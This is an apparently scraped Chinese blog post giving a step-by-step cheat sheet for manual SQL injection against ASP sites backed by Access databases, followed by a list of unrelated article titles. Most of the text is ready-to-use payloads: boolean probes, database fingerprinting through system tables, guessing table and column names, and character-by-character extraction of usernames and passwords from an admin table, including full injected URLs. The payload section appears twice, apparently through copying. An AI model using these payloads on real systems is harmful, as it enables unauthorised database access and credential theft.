access基本手工注入
来源:互联网 发布:淘宝商家在哪找的货源 编辑:程序博客网 时间:2024/04/29 23:04
判断
1=1,1=2
1>2,1<2
判断数据库类型
and (select count (*) from msysobjects)>0 异常access
and (select count (*) from sysobjects)>0 mssql正常
猜表名
and 0<>(select count(*) from 表名)
猜列名
and 0<>(select count(列名) from 表名)
猜字段长度
and (select top 1 len(username) from admin)>0
and (select top 1 len(username) from admin)>1
and (select top 1 len(username) from admin)>2
and (select top 1 len(username) from admin)>3
如果>5返回错误页面,>4返回正确页面就说明字段的长度是5
猜字段值
and (select asc(mid(username,1,1)) from admin)>96
and (select asc(mid(username,2,1)) from admin)>96
1=1,1=2
1>2,1<2
判断数据库类型
and (select count (*) from msysobjects)>0 异常access
and (select count (*) from sysobjects)>0 mssql正常
猜表名
and 0<>(select count(*) from 表名)
猜列名
and 0<>(select count(列名) from 表名)
猜字段长度
and (select top 1 len(username) from admin)>0
and (select top 1 len(username) from admin)>1
and (select top 1 len(username) from admin)>2
and (select top 1 len(username) from admin)>3
如果>5返回错误页面,>4返回正确页面就说明字段的长度是5
猜字段值
and (select asc(mid(username,1,1)) from admin)>96
and (select asc(mid(username,2,1)) from admin)>96
ascii是从0-255,使用2分法比较快。
字符型注入
http://www.hacker.com/default.asp?title=111111' and 1=(select top 1 count(*) from Admin where Asc(mid(password,3,1))="&s&") and '1'='1
http://www.hacker.com/default.asp?title=111111' and 1=1 and '1'='1 (替换中间的and1=1即可)
要加引号,后门要多加一个and‘1’=‘1,注意最后不关门。原select语句中有引号。
- access基本手工注入
- ACCESS+MYSQL手工注入
- 手工ACCESS注入方法
- asp+Access手工注入案例
- ACCESS手工注入学习笔记
- SQL注入原理-手工注入access数据库
- SQL手工注入基础详解---- Access篇
- asp+access sql手工注入步骤
- 手工注入
- 手工注入
- 手工注入
- MySQL数据库5.X版本基本手工注入总结
- MySQL数据库5.X版本基本手工注入总结
- MySQL数据库5.X版本基本手工注入总结
- ASP+ACCESS手工
- 黑客注入之手工注入
- SQL注入(手工注入)
- 手工检测可否注入
- C++ socket编程 实现服务端与客户端的通讯
- 一场无名的宿醉,失措了一夜的安然。
- PC安卓模拟器PANIC: Could not open:C:\Documents and Settings\Administrator\.android/avd/my_avd.ini解决方案
- 构造函数和析构函数学习--先运行的后释放出
- c#从剪贴板取出图片,然后写上字,保存到文件
- access基本手工注入
- Maven安装与配置
- (Android开发)学习博客总结
- 飞鸽传书:不知不觉,时间又没了!
- 飞秋 包括《java就业培训课程》
- java采集网址正则表达式(源代码)
- 从一个应用进入另外一个应用
- Java堆内存的10个要点
- vs MFC picture控件上图像局部缩放